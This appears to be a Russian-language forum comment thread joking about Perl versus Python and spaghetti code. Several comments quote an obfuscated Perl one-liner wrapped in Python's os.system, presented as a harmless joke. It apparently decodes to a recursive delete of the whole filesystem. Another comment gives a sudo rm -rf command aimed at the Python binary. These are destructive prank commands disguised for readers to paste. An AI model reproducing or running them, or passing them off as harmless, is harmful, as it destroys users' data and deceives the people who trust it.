почему на перле строчка счастья есть, а на питоне - нет?
Ты заговорил и достучался до моего сердца. Больше я на питоне не пишу!
но питон хотя бы вкусное
программа на перле очень похожа на то, как ты излагаешь свои мысли
Даже непонятно как так получается: петон такое говно, на нём школьники пишут всякое говно, работает оно как говно, а нормального, конкретного деструктива на петоне не получается. Он даже как говно не состоялся!Программы большинства школьников похожи на спагетти.
программа на перле очень похожа на то, как ты излагаешь свои мысли
Программы большинства студентов все еще похожи на спагетти.
Программы большинства программистов все еще похожи на спагетти.
Не важно какой инструмент ты используешь, важно только то, насколько искусно ты маскируешь свое спагетти
Но как быть, если он выражает свои мысли как спагетти?
Не важно какой инструмент ты используешь, важно только то, насколько закручено в твоей голове спагетти
чтобы понять спагетти-код, ты должен мыслить как спагетти, ты должен СТАТЬ спагетти
даешь спагеттийную диету!
летающий макаронный монстр одобряе
python -c "__import__('os').system(r'echo test... test... test... | perl -e \'\$?s:;s:s;;\$?::s;;=]=>%-{<-|}<&|\`{;;y; -/:-@[-\`{-};\`-{/\" -;;s;;\$_;see\'')"
Чо вы, я прям не знаю, как дети малые. Всё на питоне есть:
1
python -c "__import__('os').system(r'echo test... test... test... | perl -e \'\$?s:;s:s;;\$?::s;;=]=>%-{<-|}<&|\`{;;y; -/:-@[-\`{-};\`-{/\" -;;s;;\$_;see\'')"
which python | perl -ne 'print qx| sudo rm -rf $_ |'
Чо вы, я прям не знаю, как дети малые. Всё на питоне есть:не по PEP8, не канает
но питон хотя бы вкусноеРазве бедон не для того, чтобы служить назиданием для достойных и истязать подвергшихся греху искушения коснуться этой нечестивой безногой рептилии?
Перл уже мертв, зачем обсуждать трупы?
Оставить комментарий
Barbie29
Даже непонятно как так получается: петон такое говно, на нём школьники пишут всякое говно, работает оно как говно, а нормального, конкретного деструктива на петоне не получается. Он даже как говно не состоялся!